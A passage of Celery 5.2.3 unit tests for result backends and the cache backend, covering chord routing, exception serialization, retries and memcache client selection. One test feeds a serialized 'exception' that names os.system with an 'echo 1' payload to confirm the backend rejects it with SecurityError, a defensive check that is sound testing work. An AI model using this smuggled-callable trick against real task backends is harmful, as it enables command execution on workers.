unlock='celery.chord_unlock'): self.app.tasks[unlock] = Mock() header_result_args = ( uuid(), [self.app.AsyncResult(x) for x in range(3)], ) body = self.callback.s() self.b.apply_chord(header_result_args, body) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'testcelery' routing_queue = Mock() routing_queue.name = "routing_queue" self.app.amqp.router.route = Mock(return_value={ "queue": routing_queue }) self.b.apply_chord(header_result_args, body) assert self.app.amqp.router.route.call_args[0][1] == body.name called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs["queue"] == "routing_queue" self.b.apply_chord(header_result_args, body.set(queue='test_queue')) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'test_queue' @self.app.task(shared=False, queue='test_queue_two') def callback_queue(result): pass self.b.apply_chord(header_result_args, callback_queue.s()) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'test_queue_two' with self.Celery() as app2: @app2.task(name='callback_different_app', shared=False) def callback_different_app(result): pass callback_different_app_signature = self.app.signature('callback_different_app') self.b.apply_chord(header_result_args, callback_different_app_signature) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'routing_queue' callback_different_app_signature.set(queue='test_queue_three') self.b.apply_chord(header_result_args, callback_different_app_signature) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'test_queue_three' class test_exception_pickle: def test_BaseException(self): assert fnpe(Exception()) is None def test_get_pickleable_exception(self): exc = Exception('foo') assert gpe(exc) == exc def test_unpickleable(self): assert isinstance(fnpe(Unpickleable()), KeyError) assert fnpe(Impossible()) is None class test_prepare_exception: def setup(self): self.b = BaseBackend(self.app) def test_unpickleable(self): self.b.serializer = 'pickle' x = self.b.prepare_exception(Unpickleable(1, 2, 'foo')) assert isinstance(x, KeyError) y = self.b.exception_to_python(x) assert isinstance(y, KeyError) def test_json_exception_arguments(self): self.b.serializer = 'json' x = self.b.prepare_exception(Exception(object)) assert x == { 'exc_message': serialization.ensure_serializable( (object,), self.b.encode), 'exc_type': Exception.__name__, 'exc_module': Exception.__module__} y = self.b.exception_to_python(x) assert isinstance(y, Exception) def test_json_exception_nested(self): self.b.serializer = 'json' x = self.b.prepare_exception(objectexception.Nested('msg')) assert x == { 'exc_message': ('msg',), 'exc_type': 'objectexception.Nested', 'exc_module': objectexception.Nested.__module__} y = self.b.exception_to_python(x) assert isinstance(y, objectexception.Nested) def test_impossible(self): self.b.serializer = 'pickle' x = self.b.prepare_exception(Impossible()) assert isinstance(x, UnpickleableExceptionWrapper) assert str(x) y = self.b.exception_to_python(x) assert y.__class__.__name__ == 'Impossible' assert y.__class__.__module__ == 'foo.module' def test_regular(self): self.b.serializer = 'pickle' x = self.b.prepare_exception(KeyError('baz')) assert isinstance(x, KeyError) y = self.b.exception_to_python(x) assert isinstance(y, KeyError) def test_unicode_message(self): message = '\u03ac' x = 
self.b.prepare_exception(Exception(message)) assert x == {'exc_message': (message,), 'exc_type': Exception.__name__, 'exc_module': Exception.__module__} class KVBackend(KeyValueStoreBackend): mget_returns_dict = False def __init__(self, app, *args, **kwargs): self.db = {} super().__init__(app, *args, **kwargs) def get(self, key): return self.db.get(key) def _set_with_state(self, key, value, state): self.db[key] = value def mget(self, keys): if self.mget_returns_dict: return {key: self.get(key) for key in keys} else: return [self.get(k) for k in keys] def delete(self, key): self.db.pop(key, None) class DictBackend(BaseBackend): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._data = {'can-delete': {'result': 'foo'}} def _restore_group(self, group_id): if group_id == 'exists': return {'result': 'group'} def _get_task_meta_for(self, task_id): if task_id == 'task-exists': return {'result': 'task'} def _delete_group(self, group_id): self._data.pop(group_id, None) class test_BaseBackend_dict: def setup(self): self.b = DictBackend(app=self.app) @self.app.task(shared=False, bind=True) def bound_errback(self, result): pass @self.app.task(shared=False) def errback(arg1, arg2): errback.last_result = arg1 + arg2 self.bound_errback = bound_errback self.errback = errback def test_delete_group(self): self.b.delete_group('can-delete') assert 'can-delete' not in self.b._data def test_prepare_exception_json(self): x = DictBackend(self.app, serializer='json') e = x.prepare_exception(KeyError('foo')) assert 'exc_type' in e e = x.exception_to_python(e) assert e.__class__.__name__ == 'KeyError' assert str(e).strip('u') == "'foo'" def test_save_group(self): b = BaseBackend(self.app) b._save_group = Mock() b.save_group('foofoo', 'xxx') b._save_group.assert_called_with('foofoo', 'xxx') def test_add_to_chord_interface(self): b = BaseBackend(self.app) with pytest.raises(NotImplementedError): b.add_to_chord('group_id', 'sig') def test_forget_interface(self): b = BaseBackend(self.app) with pytest.raises(NotImplementedError): b.forget('foo') def test_restore_group(self): assert self.b.restore_group('missing') is None assert self.b.restore_group('missing') is None assert self.b.restore_group('exists') == 'group' assert self.b.restore_group('exists') == 'group' assert self.b.restore_group('exists', cache=False) == 'group' def test_reload_group_result(self): self.b._cache = {} self.b.reload_group_result('exists') self.b._cache['exists'] = {'result': 'group'} def test_reload_task_result(self): self.b._cache = {} self.b.reload_task_result('task-exists') self.b._cache['task-exists'] = {'result': 'task'} def test_fail_from_current_stack(self): import inspect self.b.mark_as_failure = Mock() frame_list = [] def raise_dummy(): frame_str_temp = str(inspect.currentframe().__repr__) frame_list.append(frame_str_temp) raise KeyError('foo') try: raise_dummy() except KeyError as exc: self.b.fail_from_current_stack('task_id') self.b.mark_as_failure.assert_called() args = self.b.mark_as_failure.call_args[0] assert args[0] == 'task_id' assert args[1] is exc assert args[2] tb_ = exc.__traceback__ while tb_ is not None: if str(tb_.tb_frame.__repr__) == frame_list[0]: assert len(tb_.tb_frame.f_locals) == 0 tb_ = tb_.tb_next def test_prepare_value_serializes_group_result(self): self.b.serializer = 'json' g = self.app.GroupResult('group_id', [self.app.AsyncResult('foo')]) v = self.b.prepare_value(g) assert isinstance(v, (list, tuple)) assert result_from_tuple(v, app=self.app) == g v2 = self.b.prepare_value(g[0]) 
assert isinstance(v2, (list, tuple)) assert result_from_tuple(v2, app=self.app) == g[0] self.b.serializer = 'pickle' assert isinstance(self.b.prepare_value(g), self.app.GroupResult) def test_is_cached(self): b = BaseBackend(app=self.app, max_cached_results=1) b._cache['foo'] = 1 assert b.is_cached('foo') assert not b.is_cached('false') def test_mark_as_done__chord(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') b.on_chord_part_return = Mock() b.mark_as_done('id', 10, request=request) b.on_chord_part_return.assert_called_with(request, states.SUCCESS, 10) def test_mark_as_failure__bound_errback_eager(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.delivery_info = { 'is_eager': True } request.errbacks = [ self.bound_errback.subtask(args=[1], immutable=True)] exc = KeyError() group = self.patching('celery.backends.base.group') b.mark_as_failure('id', exc, request=request) group.assert_called_with(request.errbacks, app=self.app) group.return_value.apply.assert_called_with( (request.id, ), parent_id=request.id, root_id=request.root_id) def test_mark_as_failure__bound_errback(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.delivery_info = {} request.errbacks = [ self.bound_errback.subtask(args=[1], immutable=True)] exc = KeyError() group = self.patching('celery.backends.base.group') b.mark_as_failure('id', exc, request=request) group.assert_called_with(request.errbacks, app=self.app) group.return_value.apply_async.assert_called_with( (request.id, ), parent_id=request.id, root_id=request.root_id) def test_mark_as_failure__errback(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [self.errback.subtask(args=[2, 3], immutable=True)] exc = KeyError() b.mark_as_failure('id', exc, request=request) assert self.errback.last_result == 5 @patch('celery.backends.base.group') def test_class_based_task_can_be_used_as_error_callback(self, mock_group): b = BaseBackend(app=self.app) b._store_result = Mock() class TaskBasedClass(Task): def run(self): pass TaskBasedClass = self.app.register_task(TaskBasedClass()) request = Mock(name='request') request.errbacks = [TaskBasedClass.subtask(args=[], immutable=True)] exc = KeyError() b.mark_as_failure('id', exc, request=request) mock_group.assert_called_once_with(request.errbacks, app=self.app) @patch('celery.backends.base.group') def test_unregistered_task_can_be_used_as_error_callback(self, mock_group): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [signature('doesnotexist', immutable=True)] exc = KeyError() b.mark_as_failure('id', exc, request=request) mock_group.assert_called_once_with(request.errbacks, app=self.app) def test_mark_as_failure__chord(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [] b.on_chord_part_return = Mock() exc = KeyError() b.mark_as_failure('id', exc, request=request) b.on_chord_part_return.assert_called_with(request, states.FAILURE, exc) def test_mark_as_revoked__chord(self): b = BaseBackend(app=self.app) b._store_result = Mock() request = Mock(name='request') request.errbacks = [] b.on_chord_part_return = Mock() b.mark_as_revoked('id', 'revoked', request=request) b.on_chord_part_return.assert_called_with(request, states.REVOKED, ANY) def test_chord_error_from_stack_raises(self): class 
ExpectedException(Exception): pass b = BaseBackend(app=self.app) callback = MagicMock(name='callback') callback.options = {'link_error': []} callback.keys.return_value = [] task = self.app.tasks[callback.task] = Mock() b.fail_from_current_stack = Mock() self.patching('celery.group') with patch.object( b, "_call_task_errbacks", side_effect=ExpectedException() ) as mock_call_errbacks: b.chord_error_from_stack(callback, exc=ValueError()) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=mock_call_errbacks.side_effect, ) def test_exception_to_python_when_None(self): b = BaseBackend(app=self.app) assert b.exception_to_python(None) is None def test_not_an_actual_exc_info(self): pass def test_not_an_exception_but_a_callable(self): x = { 'exc_message': ('echo 1',), 'exc_type': 'system', 'exc_module': 'os' } with pytest.raises(SecurityError, match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")): self.b.exception_to_python(x) def test_not_an_exception_but_another_object(self): x = { 'exc_message': (), 'exc_type': 'object', 'exc_module': 'builtins' } with pytest.raises(SecurityError, match=re.escape(r"Expected an exception class, got builtins.object with payload ()")): self.b.exception_to_python(x) def test_exception_to_python_when_attribute_exception(self): b = BaseBackend(app=self.app) test_exception = {'exc_type': 'AttributeDoesNotExist', 'exc_module': 'celery', 'exc_message': ['Raise Custom Message']} result_exc = b.exception_to_python(test_exception) assert str(result_exc) == 'Raise Custom Message' def test_exception_to_python_when_type_error(self): b = BaseBackend(app=self.app) celery.TestParamException = paramexception test_exception = {'exc_type': 'TestParamException', 'exc_module': 'celery', 'exc_message': []} result_exc = b.exception_to_python(test_exception) del celery.TestParamException assert str(result_exc) == "([])" def test_wait_for__on_interval(self): self.patching('time.sleep') b = BaseBackend(app=self.app) b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = {'status': states.PENDING} callback = Mock(name='callback') with pytest.raises(TimeoutError): b.wait_for(task_id='1', on_interval=callback, timeout=1) callback.assert_called_with() b._get_task_meta_for.return_value = {'status': states.SUCCESS} b.wait_for(task_id='1', timeout=None) def test_get_children(self): b = BaseBackend(app=self.app) b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = {} assert b.get_children('id') is None b._get_task_meta_for.return_value = {'children': 3} assert b.get_children('id') == 3 class test_KeyValueStoreBackend: def setup(self): self.b = KVBackend(app=self.app) def test_on_chord_part_return(self): assert not self.b.implements_incr self.b.on_chord_part_return(None, None, None) def test_get_store_delete_result(self): tid = uuid() self.b.mark_as_done(tid, 'Hello world') assert self.b.get_result(tid) == 'Hello world' assert self.b.get_state(tid) == states.SUCCESS self.b.forget(tid) assert self.b.get_state(tid) == states.PENDING @pytest.mark.parametrize('serializer', ['json', 'pickle', 'yaml', 'msgpack']) def test_store_result_parent_id(self, serializer): self.app.conf.accept_content = ('json', serializer) self.b = KVBackend(app=self.app, serializer=serializer) tid = uuid() pid = uuid() state = 'SUCCESS' result = 10 request = Context(parent_id=pid) self.b.store_result( tid, state=state, result=result, request=request, ) stored_meta = self.b.decode(self.b.get(self.b.get_key_for_task(tid))) assert 
stored_meta['parent_id'] == request.parent_id def test_store_result_group_id(self): tid = uuid() state = 'SUCCESS' result = 10 request = Context(group='gid', children=[]) self.b.store_result( tid, state=state, result=result, request=request, ) stored_meta = self.b.decode(self.b.get(self.b.get_key_for_task(tid))) assert stored_meta['group_id'] == request.group def test_store_result_race_second_write_should_ignore_if_previous_success(self): tid = uuid() state = 'SUCCESS' result = 10 request = Context(group='gid', children=[]) self.b.store_result( tid, state=state, result=result, request=request, ) self.b.store_result( tid, state=states.FAILURE, result=result, request=request, ) stored_meta = self.b.decode(self.b.get(self.b.get_key_for_task(tid))) assert stored_meta['status'] == states.SUCCESS def test_strip_prefix(self): x = self.b.get_key_for_task('x1b34') assert self.b._strip_prefix(x) == 'x1b34' assert self.b._strip_prefix('x1b34') == 'x1b34' def test_get_many(self): for is_dict in True, False: self.b.mget_returns_dict = is_dict ids = {uuid(): i for i in range(10)} for id, i in ids.items(): self.b.mark_as_done(id, i) it = self.b.get_many(list(ids), interval=0.01) for i, (got_id, got_state) in enumerate(it): assert got_state['result'] == ids[got_id] assert i == 9 assert list(self.b.get_many(list(ids), interval=0.01)) self.b._cache.clear() callback = Mock(name='callback') it = self.b.get_many( list(ids), on_message=callback, interval=0.05 ) for i, (got_id, got_state) in enumerate(it): assert got_state['result'] == ids[got_id] assert i == 9 assert list( self.b.get_many(list(ids), interval=0.01) ) callback.assert_has_calls([ call(ANY) for id in ids ]) def test_get_many_times_out(self): tasks = [uuid() for _ in range(4)] self.b._cache[tasks[1]] = {'status': 'PENDING'} with pytest.raises(self.b.TimeoutError): list(self.b.get_many(tasks, timeout=0.01, interval=0.01)) def test_get_many_passes_ready_states(self): tasks_length = 10 ready_states = frozenset({states.SUCCESS}) self.b._cache.clear() ids = {uuid(): i for i in range(tasks_length)} for id, i in ids.items(): if i % 2 == 0: self.b.mark_as_done(id, i) else: self.b.mark_as_failure(id, Exception()) it = self.b.get_many(list(ids), interval=0.01, max_iterations=1, READY_STATES=ready_states) it_list = list(it) assert all([got_state['status'] in ready_states for (got_id, got_state) in it_list]) assert len(it_list) == tasks_length / 2 def test_chord_part_return_no_gid(self): self.b.implements_incr = True task = Mock() state = 'SUCCESS' result = 10 task.request.group = None self.b.get_key_for_chord = Mock() self.b.get_key_for_chord.side_effect = AssertionError( 'should not get here', ) assert self.b.on_chord_part_return( task.request, state, result) is None @patch('celery.backends.base.GroupResult') @patch('celery.backends.base.maybe_signature') def test_chord_part_return_restore_raises(self, maybe_signature, GroupResult): self.b.implements_incr = True GroupResult.restore.side_effect = KeyError() self.b.chord_error_from_stack = Mock() callback = Mock(name='callback') request = Mock(name='request') request.group = 'gid' maybe_signature.return_value = callback self.b.on_chord_part_return(request, states.SUCCESS, 10) self.b.chord_error_from_stack.assert_called_with( callback, ANY, ) @patch('celery.backends.base.GroupResult') @patch('celery.backends.base.maybe_signature') def test_chord_part_return_restore_empty(self, maybe_signature, GroupResult): self.b.implements_incr = True GroupResult.restore.return_value = None self.b.chord_error_from_stack = 
Mock() callback = Mock(name='callback') request = Mock(name='request') request.group = 'gid' maybe_signature.return_value = callback self.b.on_chord_part_return(request, states.SUCCESS, 10) self.b.chord_error_from_stack.assert_called_with( callback, ANY, ) def test_filter_ready(self): self.b.decode_result = Mock() self.b.decode_result.side_effect = pass1 assert len(list(self.b._filter_ready([ (1, {'status': states.RETRY}), (2, {'status': states.FAILURE}), (3, {'status': states.SUCCESS}), ]))) == 2 @contextmanager def _chord_part_context(self, b): @self.app.task(shared=False) def callback(result): pass b.implements_incr = True b.client = Mock() with patch('celery.backends.base.GroupResult') as GR: deps = GR.restore.return_value = Mock(name='DEPS') deps.__len__ = Mock() deps.__len__.return_value = 10 b.incr = Mock() b.incr.return_value = 10 b.expire = Mock() task = Mock() task.request.group = 'grid' cb = task.request.chord = callback.s() task.request.chord.freeze() callback.backend = b callback.backend.fail_from_current_stack = Mock() yield task, deps, cb def test_chord_part_return_timeout(self): with self._chord_part_context(self.b) as (task, deps, _): try: self.app.conf.result_chord_join_timeout += 1.0 self.b.on_chord_part_return(task.request, 'SUCCESS', 10) finally: self.app.conf.result_chord_join_timeout -= 1.0 self.b.expire.assert_not_called() deps.delete.assert_called_with() deps.join_native.assert_called_with(propagate=True, timeout=4.0) def test_chord_part_return_propagate_set(self): with self._chord_part_context(self.b) as (task, deps, _): self.b.on_chord_part_return(task.request, 'SUCCESS', 10) self.b.expire.assert_not_called() deps.delete.assert_called_with() deps.join_native.assert_called_with(propagate=True, timeout=3.0) def test_chord_part_return_propagate_default(self): with self._chord_part_context(self.b) as (task, deps, _): self.b.on_chord_part_return(task.request, 'SUCCESS', 10) self.b.expire.assert_not_called() deps.delete.assert_called_with() deps.join_native.assert_called_with(propagate=True, timeout=3.0) def test_chord_part_return_join_raises_internal(self): with self._chord_part_context(self.b) as (task, deps, callback): deps._failed_join_report = lambda: iter([]) deps.join_native.side_effect = KeyError('foo') self.b.on_chord_part_return(task.request, 'SUCCESS', 10) self.b.fail_from_current_stack.assert_called() args = self.b.fail_from_current_stack.call_args exc = args[1]['exc'] assert isinstance(exc, ChordError) assert 'foo' in str(exc) def test_chord_part_return_join_raises_task(self): b = KVBackend(serializer='pickle', app=self.app) with self._chord_part_context(b) as (task, deps, callback): deps._failed_join_report = lambda: iter([ self.app.AsyncResult('culprit'), ]) deps.join_native.side_effect = KeyError('foo') b.on_chord_part_return(task.request, 'SUCCESS', 10) b.fail_from_current_stack.assert_called() args = b.fail_from_current_stack.call_args exc = args[1]['exc'] assert isinstance(exc, ChordError) assert 'Dependency culprit raised' in str(exc) def test_restore_group_from_json(self): b = KVBackend(serializer='json', app=self.app) g = self.app.GroupResult( 'group_id', [self.app.AsyncResult('a'), self.app.AsyncResult('b')], ) b._save_group(g.id, g) g2 = b._restore_group(g.id)['result'] assert g2 == g def test_restore_group_from_pickle(self): b = KVBackend(serializer='pickle', app=self.app) g = self.app.GroupResult( 'group_id', [self.app.AsyncResult('a'), self.app.AsyncResult('b')], ) b._save_group(g.id, g) g2 = b._restore_group(g.id)['result'] assert g2 == g 
def test_chord_apply_fallback(self): self.b.implements_incr = False self.b.fallback_chord_unlock = Mock() header_result_args = ( 'group_id', [self.app.AsyncResult(x) for x in range(3)], ) self.b.apply_chord( header_result_args, 'body', foo=1, ) self.b.fallback_chord_unlock.assert_called_with( self.app.GroupResult(*header_result_args), 'body', foo=1, ) def test_get_missing_meta(self): assert self.b.get_result('xxx-missing') is None assert self.b.get_state('xxx-missing') == states.PENDING def test_save_restore_delete_group(self): tid = uuid() tsr = self.app.GroupResult( tid, [self.app.AsyncResult(uuid()) for _ in range(10)], ) self.b.save_group(tid, tsr) self.b.restore_group(tid) assert self.b.restore_group(tid) == tsr self.b.delete_group(tid) assert self.b.restore_group(tid) is None def test_restore_missing_group(self): assert self.b.restore_group('xxx-nonexistant') is None class test_KeyValueStoreBackend_interface: def test_get(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).get('a') def test_set(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app)._set_with_state('a', 1, states.SUCCESS) def test_incr(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).incr('a') def test_cleanup(self): assert not KeyValueStoreBackend(self.app).cleanup() def test_delete(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).delete('a') def test_mget(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).mget(['a']) def test_forget(self): with pytest.raises(NotImplementedError): KeyValueStoreBackend(self.app).forget('a') class test_DisabledBackend: def test_store_result(self): DisabledBackend(self.app).store_result() def test_is_disabled(self): with pytest.raises(NotImplementedError): DisabledBackend(self.app).get_state('foo') def test_as_uri(self): assert DisabledBackend(self.app).as_uri() == 'disabled://' @pytest.mark.celery(result_backend='disabled') def test_chord_raises_error(self): with pytest.raises(NotImplementedError): chord(self.add.s(i, i) for i in range(10))(self.add.s([2])) @pytest.mark.celery(result_backend='disabled') def test_chain_with_chord_raises_error(self): with pytest.raises(NotImplementedError): (self.add.s(2, 2) | group(self.add.s(2, 2), self.add.s(5, 6)) | self.add.s()).delay() class test_as_uri: def setup(self): self.b = BaseBackend( app=self.app, url='sch://uuuu:pwpw@hostname.dom' ) def test_as_uri_include_password(self): assert self.b.as_uri(True) == self.b.url def test_as_uri_exclude_password(self): assert self.b.as_uri() == 'sch://uuuu:**@hostname.dom/' class test_backend_retries: def test_should_retry_exception(self): assert not BaseBackend(app=self.app).exception_safe_to_retry(Exception("test")) def test_get_failed_never_retries(self): self.app.conf.result_backend_always_retry, prev = False, self.app.conf.result_backend_always_retry expected_exc = Exception("failed") try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ expected_exc, {'status': states.SUCCESS, 'result': 42} ] try: b.get_task_meta(sentinel.task_id) assert False except Exception as exc: assert b._sleep.call_count == 0 assert exc == expected_exc finally: self.app.conf.result_backend_always_retry = prev def test_get_with_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry try: b = BaseBackend(app=self.app) 
b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ Exception("failed"), {'status': states.SUCCESS, 'result': 42} ] res = b.get_task_meta(sentinel.task_id) assert res == {'status': states.SUCCESS, 'result': 42} assert b._sleep.call_count == 1 finally: self.app.conf.result_backend_always_retry = prev def test_get_reaching_max_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry self.app.conf.result_backend_max_retries, prev_max_retries = 0, self.app.conf.result_backend_max_retries try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ Exception("failed"), {'status': states.SUCCESS, 'result': 42} ] try: b.get_task_meta(sentinel.task_id) assert False except BackendGetMetaError: assert b._sleep.call_count == 0 finally: self.app.conf.result_backend_always_retry = prev self.app.conf.result_backend_max_retries = prev_max_retries def test_get_unsafe_exception(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry expected_exc = Exception("failed") try: b = BaseBackend(app=self.app) b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.side_effect = [ expected_exc, {'status': states.SUCCESS, 'result': 42} ] try: b.get_task_meta(sentinel.task_id) assert False except Exception as exc: assert b._sleep.call_count == 0 assert exc == expected_exc finally: self.app.conf.result_backend_always_retry = prev def test_store_result_never_retries(self): self.app.conf.result_backend_always_retry, prev = False, self.app.conf.result_backend_always_retry expected_exc = Exception("failed") try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = { 'status': states.RETRY, 'result': { "exc_type": "Exception", "exc_message": ["failed"], "exc_module": "builtins", }, } b._store_result = Mock() b._store_result.side_effect = [ expected_exc, 42 ] try: b.store_result(sentinel.task_id, 42, states.SUCCESS) except Exception as exc: assert b._sleep.call_count == 0 assert exc == expected_exc finally: self.app.conf.result_backend_always_retry = prev def test_store_result_with_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = { 'status': states.RETRY, 'result': { "exc_type": "Exception", "exc_message": ["failed"], "exc_module": "builtins", }, } b._store_result = Mock() b._store_result.side_effect = [ Exception("failed"), 42 ] res = b.store_result(sentinel.task_id, 42, states.SUCCESS) assert res == 42 assert b._sleep.call_count == 1 finally: self.app.conf.result_backend_always_retry = prev def test_store_result_reaching_max_retries(self): self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry self.app.conf.result_backend_max_retries, prev_max_retries = 0, self.app.conf.result_backend_max_retries try: b = BaseBackend(app=self.app) b.exception_safe_to_retry = lambda exc: True b._sleep = Mock() b._get_task_meta_for = Mock() b._get_task_meta_for.return_value = { 'status': states.RETRY, 'result': { "exc_type": "Exception", "exc_message": ["failed"], 
"exc_module": "builtins", }, } b._store_result = Mock() b._store_result.side_effect = [ Exception("failed"), 42 ] try: b.store_result(sentinel.task_id, 42, states.SUCCESS) assert False except BackendStoreError: assert b._sleep.call_count == 0 finally: self.app.conf.result_backend_always_retry = prev self.app.conf.result_backend_max_retries = prev_max_retries ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/backends/test_cache.py0000664000175000017500000002410100000000000020343 0ustar00asifasif00000000000000import sys import types from contextlib import contextmanager from unittest.mock import Mock, patch import pytest from kombu.utils.encoding import ensure_bytes, str_to_bytes from celery import signature, states, uuid from celery.backends.cache import CacheBackend, DummyClient, backends from celery.exceptions import ImproperlyConfigured from t.unit import conftest class SomeClass: def __init__(self, data): self.data = data class test_CacheBackend: def setup(self): self.app.conf.result_serializer = 'pickle' self.tb = CacheBackend(backend='memory://', app=self.app) self.tid = uuid() self.old_get_best_memcached = backends['memcache'] backends['memcache'] = lambda: (DummyClient, ensure_bytes) def teardown(self): backends['memcache'] = self.old_get_best_memcached def test_no_backend(self): self.app.conf.cache_backend = None with pytest.raises(ImproperlyConfigured): CacheBackend(backend=None, app=self.app) def test_memory_client_is_shared(self): """This test verifies that memory:// backend state is shared over multiple threads""" from threading import Thread t = Thread( target=lambda: CacheBackend(backend='memory://', app=self.app).set('test', 12345) ) t.start() t.join() assert self.tb.client.get('test') == 12345 def test_mark_as_done(self): assert self.tb.get_state(self.tid) == states.PENDING assert self.tb.get_result(self.tid) is None self.tb.mark_as_done(self.tid, 42) assert self.tb.get_state(self.tid) == states.SUCCESS assert self.tb.get_result(self.tid) == 42 def test_is_pickled(self): result = {'foo': 'baz', 'bar': SomeClass(12345)} self.tb.mark_as_done(self.tid, result) # is serialized properly. 
rindb = self.tb.get_result(self.tid) assert rindb.get('foo') == 'baz' assert rindb.get('bar').data == 12345 def test_mark_as_failure(self): try: raise KeyError('foo') except KeyError as exception: self.tb.mark_as_failure(self.tid, exception) assert self.tb.get_state(self.tid) == states.FAILURE assert isinstance(self.tb.get_result(self.tid), KeyError) def test_apply_chord(self): tb = CacheBackend(backend='memory://', app=self.app) result_args = ( uuid(), [self.app.AsyncResult(uuid()) for _ in range(3)], ) tb.apply_chord(result_args, None) assert self.app.GroupResult.restore(result_args[0], backend=tb) == self.app.GroupResult(*result_args) @patch('celery.result.GroupResult.restore') def test_on_chord_part_return(self, restore): tb = CacheBackend(backend='memory://', app=self.app) deps = Mock() deps.__len__ = Mock() deps.__len__.return_value = 2 restore.return_value = deps task = Mock() task.name = 'foobarbaz' self.app.tasks['foobarbaz'] = task task.request.chord = signature(task) result_args = ( uuid(), [self.app.AsyncResult(uuid()) for _ in range(3)], ) task.request.group = result_args[0] tb.apply_chord(result_args, None) deps.join_native.assert_not_called() tb.on_chord_part_return(task.request, 'SUCCESS', 10) deps.join_native.assert_not_called() tb.on_chord_part_return(task.request, 'SUCCESS', 10) deps.join_native.assert_called_with(propagate=True, timeout=3.0) deps.delete.assert_called_with() def test_mget(self): self.tb._set_with_state('foo', 1, states.SUCCESS) self.tb._set_with_state('bar', 2, states.SUCCESS) assert self.tb.mget(['foo', 'bar']) == {'foo': 1, 'bar': 2} def test_forget(self): self.tb.mark_as_done(self.tid, {'foo': 'bar'}) x = self.app.AsyncResult(self.tid, backend=self.tb) x.forget() assert x.result is None def test_process_cleanup(self): self.tb.process_cleanup() def test_expires_as_int(self): tb = CacheBackend(backend='memory://', expires=10, app=self.app) assert tb.expires == 10 def test_unknown_backend_raises_ImproperlyConfigured(self): with pytest.raises(ImproperlyConfigured): CacheBackend(backend='unknown://', app=self.app) def test_as_uri_no_servers(self): assert self.tb.as_uri() == 'memory:///' def test_as_uri_one_server(self): backend = 'memcache://127.0.0.1:11211/' b = CacheBackend(backend=backend, app=self.app) assert b.as_uri() == backend def test_as_uri_multiple_servers(self): backend = 'memcache://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/' b = CacheBackend(backend=backend, app=self.app) assert b.as_uri() == backend def test_regression_worker_startup_info(self): pytest.importorskip('memcached') self.app.conf.result_backend = ( 'cache+memcached://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/' ) worker = self.app.Worker() with conftest.stdouts(): worker.on_start() assert worker.startup_info() class MyMemcachedStringEncodingError(Exception): pass class MemcachedClient(DummyClient): def set(self, key, value, *args, **kwargs): key_t, must_be, not_be, cod = bytes, 'string', 'bytes', 'decode' if isinstance(key, key_t): raise MyMemcachedStringEncodingError( f'Keys must be {must_be}, not {not_be}. 
Convert your ' f'strings using mystring.{cod}(charset)!') return super().set(key, value, *args, **kwargs) class MockCacheMixin: @contextmanager def mock_memcache(self): memcache = types.ModuleType('memcache') memcache.Client = MemcachedClient memcache.Client.__module__ = memcache.__name__ prev, sys.modules['memcache'] = sys.modules.get('memcache'), memcache try: yield True finally: if prev is not None: sys.modules['memcache'] = prev @contextmanager def mock_pylibmc(self): pylibmc = types.ModuleType('pylibmc') pylibmc.Client = MemcachedClient pylibmc.Client.__module__ = pylibmc.__name__ prev = sys.modules.get('pylibmc') sys.modules['pylibmc'] = pylibmc try: yield True finally: if prev is not None: sys.modules['pylibmc'] = prev class test_get_best_memcache(MockCacheMixin): def test_pylibmc(self): with self.mock_pylibmc(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] assert cache.get_best_memcache()[0].__module__ == 'pylibmc' @pytest.mark.masked_modules('pylibmc') def test_memcache(self, mask_modules): with self.mock_memcache(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] assert (cache.get_best_memcache()[0]().__module__ == 'memcache') 